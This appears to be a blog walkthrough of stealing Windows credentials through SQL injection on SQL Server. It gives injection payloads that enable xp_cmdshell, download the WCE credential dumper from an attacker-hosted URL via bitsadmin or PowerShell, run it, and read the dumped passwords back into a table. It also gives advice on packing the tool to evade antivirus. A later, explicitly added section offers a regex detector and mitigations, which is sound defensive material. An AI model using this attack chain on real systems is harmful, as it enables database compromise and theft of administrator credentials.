Here are the steps to get the credentials through SQL injection (SQLi):
- Enable xp_cmdshell
- Download wce on to the machine
- Get the IP address
- Run wce as the administrator & output to a text file
- Read the data from the output file
1. Enable xp_cmdshell
xp_cmdshell allows OS command execution on Windows-based SQL Server hosts. It is not enabled by default and has to be turned on. It can be enabled with this command:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
Now we should be able to run OS commands through SQL. The format is:
execute xp_cmdshell 'command'
Reading the output from xp_cmdshell is slightly tricky. This can be done in three steps:
- Create a new table (say IIP) with one column and insert the output of xp_cmdshell into that table
- Read the data from the table IIP using union
- Delete the table IIP
Here is an example of using xp_cmdshell to get the IP address with ipconfig:
- create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'ipconfig'
- union select 2,line,'a',2 from iip
- drop table iip
2. Download wce on the machine
WCE (Windows Credential Extractor) is an awesome tool which can be used to dump credentials in clear text. You will need to run it as administrator. Most AVs have blacklisted the tool.
I used the mpress packer (UPX should work as well) to pack this executable to avoid detection.
Check whether AV still flags the packed executable.
Host the exe on an internet site or somewhere else the SQL server can reach. Either the bitsadmin command line below or PowerShell can be used to download it:
bitsadmin /transfer mydownloadjob /download /priority normal http://yoursite destination
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile("source","dest")
3. Get the IP
Use xp_cmdshell to get the IP address:
execute xp_cmdshell 'ipconfig'
4. Run WCE as admin and output data to a file
WCE should be run as an admin, and it was hard to read its output directly through SQL, so I sent the output to a file and later read the values from the output file into a table in the database.
WCE command:
C:\temp\wce_mp.exe -w > C:\temp\output.txt
SQL command:
k3';create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'C:\temp\wce_mp.exe -w > C:\temp\output.txt';--
5. Read data from the file
The data can be read using the Windows type command:
type file.txt
SQL command to read the output:
k3';insert into iip execute xp_cmdshell 'type C:\temp\output.txt';--
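From the defender's side, every step above leaves a trace in captured T-SQL text (a SQL Server Audit, an Extended Events session on sql_batch_completed, or an application query log). The script below is an added example, not part of the original post or of the WCE project: it runs one detection rule per stage of the chain over a constructed batch of statement text that mirrors the steps above, and reports when the whole chain is present. The sample statements, the rule names and the helper functions are my own constructions.

```python
import re

# Constructed sample of captured T-SQL statement text (hypothetical, not from
# any real server). Each line mirrors one step of the chain described above.
SAMPLE_STATEMENTS = [
    "SELECT name FROM products WHERE id = 3",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "create table iip(line varchar(2000));insert into iip execute xp_cmdshell 'ipconfig'",
    "execute xp_cmdshell 'bitsadmin /transfer mydownloadjob /download /priority normal "
    "http://yoursite C:\\temp\\wce_mp.exe'",
    "insert into iip execute xp_cmdshell 'C:\\temp\\wce_mp.exe -w > C:\\temp\\output.txt'",
    "insert into iip execute xp_cmdshell 'type C:\\temp\\output.txt'",
    "drop table iip",
]

# One rule per stage. Patterns are case-insensitive because T-SQL keywords are.
RULES = [
    # sp_configure flipping xp_cmdshell to 1.
    ("enable_xp_cmdshell",
     re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    # Any xp_cmdshell call with a literal command (works with or without EXEC).
    ("xp_cmdshell_exec",
     re.compile(r"\bxp_cmdshell\s+'", re.I)),
    # The INSERT ... EXEC trick used above to make command output readable.
    ("capture_output_in_table",
     re.compile(r"\binsert\s+into\s+\w+\s+exec(?:ute)?\s+xp_cmdshell\b", re.I)),
    # The two download methods named on this page.
    ("download_via_xp_cmdshell",
     re.compile(r"xp_cmdshell\s+'[^']*(?:bitsadmin\s+/transfer|Net\.WebClient|DownloadFile)", re.I)),
    # The command itself is a wce*.exe binary; extend this list from your own intel.
    ("credential_dumper",
     re.compile(r"xp_cmdshell\s+'\s*[^'\s]*wce\w*\.exe\b", re.I)),
    # Reading a dropped file back through 'type'.
    ("read_dropped_file",
     re.compile(r"xp_cmdshell\s+'\s*type\s+[^']+'", re.I)),
]

# Stages that, seen together from one login/session, indicate the full chain
# rather than an administrator running a single ad-hoc command.
CHAIN_STAGES = {"enable_xp_cmdshell", "download_via_xp_cmdshell",
                "credential_dumper", "read_dropped_file"}


def classify(statement):
    """Return the names of every rule the statement triggers, in rule order."""
    return [name for name, pattern in RULES if pattern.search(statement)]


def scan(statements):
    """Return (index, statement, tags) for every statement that triggers a rule."""
    hits = []
    for i, stmt in enumerate(statements):
        tags = classify(stmt)
        if tags:
            hits.append((i, stmt, tags))
    return hits


def stages_seen(statements):
    """Set of stage names present anywhere in the batch of statements."""
    return {tag for _, _, tags in scan(statements) for tag in tags}


def full_chain_present(statements):
    """True when every high-confidence stage of the chain appears in the batch."""
    return CHAIN_STAGES <= stages_seen(statements)


if __name__ == "__main__":
    for i, stmt, tags in scan(SAMPLE_STATEMENTS):
        print(f"[{i}] {', '.join(tags)}: {stmt[:70]}")
    print("full chain present:", full_chain_present(SAMPLE_STATEMENTS))
```

A single xp_cmdshell call can be legitimate administration, so the script only reports the full chain when the enable, download, dumper and file-read stages all appear in the same batch; the per-statement tags are still worth logging on their own. Because sp_configure changes need the ALTER SETTINGS permission (held by the sysadmin and serveradmin roles), an enable statement arriving through an application login is a finding by itself, and the simplest mitigation is to keep application logins out of those roles and leave xp_cmdshell disabled.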
I have created a video for the exploit.